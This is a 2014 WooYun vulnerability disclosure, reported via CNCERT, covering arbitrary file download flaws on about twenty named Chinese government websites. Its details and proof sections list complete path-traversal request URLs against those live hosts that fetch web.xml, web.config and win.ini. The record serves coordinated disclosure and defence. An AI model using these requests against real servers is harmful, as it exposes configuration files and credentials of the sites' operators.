当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-065973

漏洞标题:多个政府网站任意文件下载漏洞

相关厂商:cncert

漏洞作者: eval

提交时间:2014-06-26 18:45

修复时间:2014-08-10 18:46

公开时间:2014-08-10 18:46

漏洞类型:任意文件遍历/下载

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-06-26: 细节已通知厂商并且等待厂商处理中
2014-06-30: 厂商已经确认,细节仅向厂商公开
2014-07-10: 细节向核心白帽子及相关领域专家公开
2014-07-20: 细节向普通白帽子公开
2014-07-30: 细节向实习白帽子公开
2014-08-10: 细节向公众公开

简要描述:

rt

详细说明:

google 搜索了一批政府网站,发现大部分都有任意文件下载漏洞,批量提交,希望不走小厂商。
www.sxazj.gov.cn/download.jsp?path=../WEB-INF/web.xml
www.nqs.gov.cn/cms/web/download.jsp?FileUrl=web/download.jsp
http://www.heyuan.gov.cn/do_download.jsp?path=/do_download.jsp
rd.heyuan.gov.cn/do_download.jsp?path=/do_download.jsp
http://www.lntour.gov.cn/load.jsp?path=../WEB-INF&file=web.xml
http://www.zscj.gov.cn/DownFile/OpenFile.aspx?XFileName=../web.config&FileName=web.config
www.zsoaf.gov.cn/DownFile/OpenFile.aspx?XFileName=../web.config&FileName=web.config
http://bbs.nbdl.gov.cn/down.aspx?path=web.config&fname=web
http://www.hfaic.gov.cn/gongshang/DownFile?path=C:/windows/win.ini&showname=win
www.tclm.gov.cn:8080/downLoadFile?filePath=WEB-INF/web.xml
http://www.ngtc.gov.cn/ngtc/showimage?filePath=WEB-INF/&fileName=web.xml&fileSort=-1111
http://www.hebgwyj.gov.cn/cyportal1.3/downloadtag.jsp?fileName=web.xml&filePath=../WEB-INF/web.xml
http://www.wztax.gov.cn/system/FunPages/DownloadFile.jsp?filePath=./WEB-INF&name=web.xml
http://xzsp.hcq.gov.cn:94/servlet/download?filepath=/WEB-INF/web.xml&filename=web.xml
http://www.xczwzx.gov.cn/FileDownload?filepath=C:windows\win.ini&dispname=win.ini
www.yk365.gov.cn/servlet/FileDownload?filepath=C:windows/win.ini
www.tongcheng.gov.cn/servlet/FileDownload?filepath=C:windows/win.ini
www.56hlj.com/news/downLoad.jsp?filePath=WEB-INF/web.xml
http://pc.sach.gov.cn/news/downLoad.jsp?filePath=WEB-INF/web.xml

漏洞证明:

www.sxazj.gov.cn/download.jsp?path=../WEB-INF/web.xml
www.nqs.gov.cn/cms/web/download.jsp?FileUrl=web/download.jsp
http://www.heyuan.gov.cn/do_download.jsp?path=/do_download.jsp
rd.heyuan.gov.cn/do_download.jsp?path=/do_download.jsp
http://www.lntour.gov.cn/load.jsp?path=../WEB-INF&file=web.xml
http://www.zscj.gov.cn/DownFile/OpenFile.aspx?XFileName=../web.config&FileName=web.config
www.zsoaf.gov.cn/DownFile/OpenFile.aspx?XFileName=../web.config&FileName=web.config
http://bbs.nbdl.gov.cn/down.aspx?path=web.config&fname=web
http://www.hfaic.gov.cn/gongshang/DownFile?path=C:/windows/win.ini&showname=win
www.tclm.gov.cn:8080/downLoadFile?filePath=WEB-INF/web.xml
http://www.ngtc.gov.cn/ngtc/showimage?filePath=WEB-INF/&fileName=web.xml&fileSort=-1111
http://www.hebgwyj.gov.cn/cyportal1.3/downloadtag.jsp?fileName=web.xml&filePath=../WEB-INF/web.xml
http://www.wztax.gov.cn/system/FunPages/DownloadFile.jsp?filePath=./WEB-INF&name=web.xml
http://xzsp.hcq.gov.cn:94/servlet/download?filepath=/WEB-INF/web.xml&filename=web.xml
http://www.xczwzx.gov.cn/FileDownload?filepath=C:windows\win.ini&dispname=win.ini
www.yk365.gov.cn/servlet/FileDownload?filepath=C:windows/win.ini
www.tongcheng.gov.cn/servlet/FileDownload?filepath=C:windows/win.ini
www.56hlj.com/news/downLoad.jsp?filePath=WEB-INF/web.xml
http://pc.sach.gov.cn/news/downLoad.jsp?filePath=WEB-INF/web.xml


cncert验证下?

修复方案:

批量处置吧。。。过滤什么的

版权声明:转载请注明来源 eval@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2014-06-30 22:24

厂商回复:

CNVD确认所述案例情况已经分别由CNCERT向国土资源部以及其他涉及的分中心通报,主要以广东分中心为主。按多个实例综合评分,rank 20+

最新状态:

暂无


漏洞评价:

评论

  1. 2014-06-26 18:53 | eval ( 普通白帽子 | Rank:131 漏洞数:23 | 专注小厂商五十年。)

    终于通过了,感谢管理员 @疯狗

  2. 2014-06-26 19:00 | ( 普通白帽子 | Rank:1207 漏洞数:104 | 传闻中魇是一个惊世奇男子,但是除了他华...)

    @eval 话说是什么时候提交的?

  3. 2014-06-26 19:01 | eval ( 普通白帽子 | Rank:131 漏洞数:23 | 专注小厂商五十年。)

    @魇 一个星期之前,很久了 诶 以为不通过的

  4. 2014-08-11 00:51 | Calify ( 路人 | Rank:7 漏洞数:5 | 未能联系到厂商或者厂商积极拒绝)

    谷歌搜索= =改天我去搞一批被挂赌博的网站会通过么= =

  5. 2014-11-03 16:41 | 乌帽子 ( 路人 | Rank:29 漏洞数:3 | 学习黑客哪家强 | 中国山东找蓝翔 | sql...)

    C:windows/win.ini 也可以下的?